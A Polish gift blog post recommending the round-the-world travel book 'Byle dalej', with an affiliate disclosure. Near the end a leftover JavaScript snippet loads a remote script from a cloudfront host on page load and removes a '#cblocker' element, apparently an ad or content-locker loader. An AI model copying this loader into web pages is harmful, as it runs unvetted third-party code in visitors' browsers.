Prezentuję prawdziwych obieżyświatów

1 lipca 2012
Byle dalej!

Na początku będą przeprosiny, że zakończenie cyklu wakacyjnych prezentów dla podróżników trochę się odwlekło – ponieważ winne jest Euro 2012 i piękna pogoda, mam nadzieję, że mogę liczyć na Wasze zrozumienie. A teraz już, niejako tradycyjnie, zanim opiszę pomysł na prezent pora na opowieść o tym, skąd się wziął. 

Zimą, ponad trzy lata temu – jak ten czas szybko leci – dostałam od przyjaciółki link do pewnego bloga, a na nim wpisu o nadawaniu paczki z Indii do Polski. Od tego wpisu, kultowego zresztą dla wielu czytelników tamtego bloga, zaczęło się moje małe uzależnienie od twórczości pisarskiej pewnej zwariowanej pary podróżników. Dlatego odkąd dowiedziałam się, że napiszą książkę wiedziałam, że ją kupię i opiszę tutaj, abyście Wy także to zrobili – w prezencie dla samych siebie lub innych podróżników.


Powiedziałabym, że podróżowanie dookoła świata stało się ostatnio modnym sportem i w sieci można znaleźć mnóstwo blogów osób, które na krócej lub dłużej porzuciły pracę i ustatkowane życie, żeby zobaczyć miejsca mniej i bardziej znane oraz przeżyć niezapomnianą przygodę. Czytałam i wciąż czytam kilka takich blogów, ale blog Marty i Bartka od początku należał do moich ulubionych i strasznie mi go brakowało, kiedy już wrócili do kraju po 888 dniach spędzonych na rowerach, skuterach, motorach oraz oczywiście w innych środkach lokomocji. Dlatego z taką niecierpliwością czekałam na ich książkę.
  
“Byle dalej” Marta Owczarek & Bartek Skowroński – cena: 33,49 zł (www.merlin.pl/)

Czasem kiedy się długo na coś czeka można się rozczarować, bo rzeczywistość nie dorasta do wyobrażeń. Tym razem tak nie było – książkę przeczytałam jednym tchem, a później dostali ją moi rodzice: Tata już kończy, a Mama czeka w kolejce. Co prawda po przeczytaniu przygód Marty i Bartka mój Tata, też podróżnik, powiedział, że nie wie czy nawet w młodości porwałby się na takie rzeczy, jakie opisują, ale dlatego właśnie ta książka tak mi się podoba. Bo pokazuje, czasem bardzo szczegółowo, że można inaczej podróżować, tylko trzeba się odważyć.


P.S. Zdjęcie pochodzi ze strony www.merlin.pl/

Zawarte w tym wpisie linki do sklepu Merlin to tak zwane linki afiliacyjne. Oznacza to, iż jeśli klikając na nie dokonacie zakupu otrzymam z tego tytułu prowizję. Nie zmieni to w żaden sposób ceny jaką Wy zapłacicie za zamówione produkty, a pokaże mi, że doceniacie moje rekomendacje. Będę Wam bardzo wdzięczna za korzystanie z tych linków.


if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi:

Kategoria: , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję prąd na korbkę

Następny

Prezentuję nietypowy kalendarz

Comments are closed here.